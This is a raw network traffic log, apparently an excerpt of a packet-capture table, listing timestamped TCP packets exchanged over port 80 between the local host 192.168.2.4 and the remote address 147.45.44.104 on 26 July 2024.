Jul 26, 2024 18:56:46.899880886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.899895906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.899905920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.899928093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.899961948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.900552988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.900564909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.900573969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.900597095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.900626898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.901341915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.901355982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.901393890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.901408911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.902107954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.902159929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.902529955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.902543068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.902579069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.903311014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.903325081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.903361082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.903392076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.942190886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.942271948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.942285061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.942286015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.942336082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.942336082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.943027020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.943038940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.943083048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.943974972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.943988085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.944020987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.944046021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.944850922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.944864035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.944897890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.944921017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.945616007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.945630074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.945641994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.945652962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.945660114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.945677996 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.945707083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.946374893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.946388006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.946398973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.946422100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.946439028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.947293043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.947305918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.947324038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.947339058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.947365046 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.948596001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.948609114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.948620081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.948635101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.948643923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.948661089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.948685884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.949229002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.949243069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.949254036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.949300051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.949316978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.950001001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.950014114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.950025082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.950042963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.950067997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951112032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951126099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951136112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951148033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951154947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951179028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951204062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951899052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951913118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951924086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.951941967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951956987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.951970100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.953502893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.953519106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.953530073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.953551054 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.953567028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.954169035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954181910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954193115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954204082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954211950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.954242945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.954813957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954827070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954838037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.954859018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.954879999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.955718040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.955730915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.955743074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.955760002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.955787897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.956587076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.956600904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.956612110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.956624031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.956633091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.956651926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.956680059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.957544088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.957556963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.957567930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.957578897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.957611084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.957626104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.958399057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.958411932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.958422899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.958451033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.958479881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.959053040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.959067106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.959078074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.959089041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.959100962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.959104061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.959125042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.959151983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.960047960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.960061073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.960072041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.960083961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.960099936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.960138083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.960138083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.961080074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.961091995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.961100101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.961110115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.961137056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.961169004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.962029934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.962042093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.962050915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.962057114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.962066889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.962084055 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.962122917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.963016033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.963027954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.963037968 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.963047981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.963072062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.963099957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.963985920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.963998079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.964008093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.964019060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.964029074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.964037895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.964040041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.964073896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.964073896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.965078115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.965090990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.965099096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.965112925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.965135098 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.965172052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.965172052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.966003895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966016054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966026068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966036081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966080904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.966110945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.966893911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966906071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966914892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966922998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966933012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966943026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.966943026 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.966974020 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.967000961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.967741966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.967752934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.967761993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.967772961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.967796087 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.967824936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.968619108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.968630075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.968640089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.968672991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.968704939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.038642883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.038747072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.038816929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.038830042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.038856983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.038876057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.039258957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.039271116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.039280891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.039293051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.039298058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.039316893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.039335966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.040020943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040033102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040045023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040056944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040066004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.040095091 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.040965080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040977001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040988922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.040998936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.041012049 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.041038036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.041049004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.042045116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.042057037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.042067051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.042079926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.042089939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.042100906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.042131901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.042131901 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.042994022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043004990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043015003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043025017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043037891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.043065071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.043931961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043945074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043956995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043968916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043977976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.043982029 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.044019938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.044034004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.044919014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.044930935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.044941902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.044951916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.044964075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.044991016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.045864105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.045877934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.045887947 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.045898914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.045907021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.045909882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.045934916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.045960903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.046916962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.046928883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.046938896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.046950102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.046957970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.046972990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.046999931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.047636032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047648907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047657967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047668934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047677994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047684908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.047693014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.047715902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.047728062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.048724890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048738003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048748016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048758984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048769951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048779964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.048796892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.048835993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.049607038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049618006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049628973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049638987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049648046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049659014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.049659014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.049719095 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.050654888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.050667048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.050677061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.050688028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.050698042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.050700903 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.050725937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.050755024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.051570892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051589966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051599979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051611900 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051621914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051624060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.051634073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.051645994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.051678896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.052536964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.052547932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.052552938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.052558899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.052587032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.052614927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.053323984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053335905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053348064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053358078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053366899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.053368092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053380013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.053397894 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.053422928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:47.054311037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.054323912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.054332972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.054343939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:47.054353952 CEST	80	49757	147.45.44.104	192.168.2.4
